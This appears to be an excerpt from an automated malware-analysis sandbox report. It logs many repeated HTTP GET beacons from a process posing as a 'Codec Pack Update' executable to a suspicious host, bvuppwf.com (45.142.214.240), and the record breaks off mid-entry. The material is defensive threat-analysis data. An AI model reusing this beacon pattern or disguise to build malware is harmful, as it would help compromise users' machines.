                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.44978645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:34.777688980 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:35.075176001 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.44978745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:35.421195984 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:35.723900080 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.44978845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:36.058656931 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:36.364326000 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.44978945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:36.699173927 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:36.995959044 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:37.106190920 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:37.409293890 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        50192.168.2.44979045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:37.749118090 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:38.048827887 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        51192.168.2.44979145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:38.599677086 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:38.906938076 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        52192.168.2.44979245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:39.978368044 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:40.282648087 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        53192.168.2.44979345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:40.621953011 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:40.917171001 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:41.029453993 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:41.330909014 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        54192.168.2.44979445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:41.668621063 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:41.965167999 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:42.076478004 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:42.389615059 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:42.497809887 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:42.794445992 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:42.903228998 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:43.203939915 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        55192.168.2.44979545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:43.547929049 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:43.846704006 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        56192.168.2.44979645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:44.183959007 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:44.487411022 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        57192.168.2.44979745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:44.826159954 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:45.124955893 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        58192.168.2.44979845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:45.464018106 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:45.771872997 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        59192.168.2.44979945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:46.108211040 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:46.415388107 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        60192.168.2.44980045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:46.748719931 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:47.047234058 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:47.153192043 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:47.457124949 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        61192.168.2.44980145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:47.793024063 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:48.091517925 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:48.200098038 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:48.501480103 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        62192.168.2.44980245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:48.841670036 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:49.144664049 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        63192.168.2.44980345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:49.480505943 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:49.777338028 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        64192.168.2.44980445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
